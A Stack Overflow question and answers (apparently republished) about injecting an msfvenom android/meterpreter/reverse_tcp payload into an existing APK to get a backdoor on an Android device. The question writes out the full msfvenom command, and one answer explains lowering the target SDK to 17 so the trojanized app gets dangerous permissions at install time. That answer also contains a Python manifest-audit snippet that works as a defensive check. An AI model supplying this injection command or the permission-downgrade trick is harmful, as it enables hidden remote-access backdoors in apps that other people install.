Payload-injected app doesn't ask for any permissions

I'm trying to inject an APK with an msfvenom payload, and thus get a backdoor on my Android device upon installing it. Why isn't it asking for permissions upon installation?

In the past I've been able to successfully create a standalone payload and get a backdoor tunnel to my device.

msfvenom -p android/meterpreter/reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST=[IP] LPORT=[port] -o /Users/root/Desktop/android.apk

I expected the app to ask for all the permissions specified in the manifest file, but it isn't asking for any during installation or at runtime.



Solution 1:[1]

I had the same problem, but I have found a fix for it.

  1. Create an APK file injected with the payload.
  2. Install it on your phone.
  3. Install APK Editor Pro v1.9.7.
  4. Open the APK editor, search for the injected APK, click on it, and click on COMMON EDIT.
  5. Change Minimum SDK version to 10 and Target SDK Version to 17.

I have already checked it and it's working.
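The Target SDK Version of 17 in Solution 1 is below API level 23, where Android applies the older install-time permission model instead of per-permission runtime requests. From the reviewing side, the check below (an added example, not part of the original answers) flags a manifest that combines a pre-23 target with dangerous permissions. It assumes the manifest has already been decoded to text XML with numeric SDK values; the permission subset and both sample manifests are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
RUNTIME_PERMISSIONS_API = 23  # Android 6.0 introduced runtime permission requests

# Constructed subset of permissions with the "dangerous" protection level.
DANGEROUS = {
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION",
}

def audit_manifest(manifest_xml):
    """Report whether dangerous permissions fall under the install-time model."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    attrs = sdk.attrib if sdk is not None else {}
    # Platform defaults: minSdkVersion is 1, targetSdkVersion falls back to it.
    min_sdk = int(attrs.get(ANDROID + "minSdkVersion", 1))
    target_sdk = int(attrs.get(ANDROID + "targetSdkVersion", min_sdk))
    requested = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    dangerous = sorted(requested & DANGEROUS)
    return {
        "target_sdk": target_sdk,
        "dangerous": dangerous,
        # True: dangerous permissions are handled under the pre-23 model.
        "install_time_grant": target_sdk < RUNTIME_PERMISSIONS_API and bool(dangerous),
    }

# Constructed sample manifests (not taken from any real app).
HEADER = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
          'package="com.example.sample">')
LEGACY = HEADER + """
  <uses-sdk android:minSdkVersion="10" android:targetSdkVersion="17"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""
MODERN = LEGACY.replace('targetSdkVersion="17"', 'targetSdkVersion="33"')

if __name__ == "__main__":
    for name, xml in (("legacy", LEGACY), ("modern", MODERN)):
        print(name, audit_manifest(xml))
```
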

Solution 2:[2]

You need to specify what permissions the Main.apk has on your device. Did you check those? If it has not asked for permission, chances are it has no permission.

Solution 3:[3]

I have found some problems in the payload generation, but I have also found a solution.

1.- Inject the payload in the original application.

2.- Install the APK file on an Android device.

3.- Go to application settings and search for the infected application.

4.- Grant all permissions.

And that's it, this worked for me.

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 Dharman
Solution 2 Muhammad Ismail
Solution 3